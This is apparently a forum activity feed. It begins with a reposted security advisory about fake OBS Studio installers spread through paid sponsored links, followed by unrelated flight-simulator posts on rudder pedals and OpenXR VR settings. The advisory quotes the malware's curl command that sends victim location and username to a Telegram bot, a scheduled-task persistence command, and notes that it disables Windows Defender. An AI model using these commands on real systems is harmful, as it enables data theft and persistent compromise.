Don't use: Open Broadcaster Software (OBS) Studio being delivered through paid sponsored links.
-
From Blackpoint Cyber Security (partner): Blackpoint Cyber is actively monitoring malicious Open Broadcaster Software (OBS) Studio being delivered through paid sponsored links. The use of sponsored links to distribute malware is another iteration in the continual attempts to compromise devices. The security community is discussing the most recent distribution of fake OBS software as a means of infecting victims, and we wanted to share some details that we have not seen published yet. The initial stage of the installation will use cURL to obtain country, IP, and city details from IPiNfo.io as three separate communications. Once this is acquired, the information is sent to a telegrams chat using a hard coded API account. curl.exe -s -k -d chat_id= --data-urlencode "text=[text] IP: X.X.X.X , Country: US, City: , UserName: [this is the device username], Date: Thu mm/dd/yyyy, hh:mm:ss" "https://api.telegram.org/[hardcoded_ID] /sendmessage" From there, it will systematically use the registry keys to disable core functionality, such as Windows Defender, and uninstall Malware Bytes. To ensure persistence, it will create a scheduled task: schtasks.exe /create /xml "C:\Users [username]\AppData\Roaming\obs-studio\bin\64bit\ar.xml How to Mitigate: Ensure you are accessing websites directly. Advertisements and affiliate links may lead to malicious websites. Only download software from legitimate websites and sources. If a paid software is being offered for free or at a discounted price, there is a higher chance it’s malicious. Important: Blackpoint’s SOC has seen indicators of compromise in our partners’ environments. The Blackpoint SOC will continue to actively monitor for any indicators of compromise associated with this vulnerability. We are confident that our experienced MDR analysts and technology will continue to protect your business and clients. Sincerely, Blackpoint Cyber

Toe brake software? Please explain. S!
-
Kameraden, Been having issues with the helicopters in DCS. My Thrustmaster T.Flight Rudder Pedals were sticking in the centre position and it was causing me all sorts of grief during landings. One of my restrictions, is my GT Track frame has limited width (which is why I'm not using my MFG Crosswinds). Looked at the Virpil pedals, but they were out of stock. So I settled on the VKB T-Rudder MkIV, all metal and very precise. I do however consider them entry level, no toe brakes and light. But fairly inexpensive. First flight was very good and I've solved my problem, will be concentrating on various choppers over the next while. S!

OpenXR support for IL-2 and DCS for Windows Mixed Reality VR headsets
Lipfert replied to Gus's topic in Technical Support
Gus, Last night while dogfighting, I went default VR game settings and bump up MFAA to x2. Seemed pretty good to me. I'll try CAS and see what I get. But less seems to be better. S! -

OpenXR support for IL-2 and DCS for Windows Mixed Reality VR headsets

With Motion Reprojection on 45 fps. With it off, 70-90 fps. Really smooth though. Again, this was a starting point for Labroisse as he was having issues. S! -
OpenXR support for IL-2 and DCS for Windows Mixed Reality VR headsets
Lipfert replied to Gus's topic in Technical Support
Labroisse, Based on video's by Iceman VR, here is a good baseline setup for DCS VR. This is where I started, before tweaking. Override Resolution can be set to NO since it's the same as the other main setting. S! -
I would suggest looking at OpenXR. S!

Kameraden, I've been installing and setting up Aussiedroid's Enhanced Warthog Script. It's really something, very interesting. S!

Kameraden, Is version 4.0 of Horizons what everyone is running? S!
-
Kameraden, Want to see what it looks like in OpenXR. I don't have the latest version, just Horizons. It made me install version 4.0 Once you replace the dll, do you still launch it from Steam? S!
